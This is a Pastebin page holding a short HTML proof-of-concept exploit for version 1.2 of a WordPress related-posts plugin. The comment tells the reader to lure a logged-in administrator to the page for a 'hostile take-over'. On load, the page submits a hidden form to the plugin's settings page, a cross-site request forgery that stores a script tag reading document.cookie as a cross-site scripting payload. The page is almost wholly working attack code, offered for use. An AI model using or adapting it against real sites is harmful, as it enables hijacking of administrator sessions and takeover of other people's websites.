Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <title>woprdress</title>
- <!--
- wordpress-23-related-posts-plugin 1.2 csrf/xss/script insertion security bug
- by: marty_the_dns_guru
- http://wordpress.org/extend/plugins/wordpress-23-related-posts-plugin/
- trick the wordpress admin into visiting this page while logged in, and ..
- _hostile take-over_!
- -->
- </head>
- <body onload="document.forms['form1'].submit();">
- <form method="post" action="http://[host]/wp-admin/options-general.php?page=wp_related_posts.php" id="form1">
- <input type="hidden" name="wp_rp_title_option" value=""><script>alert(/enemy missile!enemy missile!/ + document.cookie);</script>">
- <input type="hidden" name="wp_rp_Submit" value="Save changes">
- </form>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement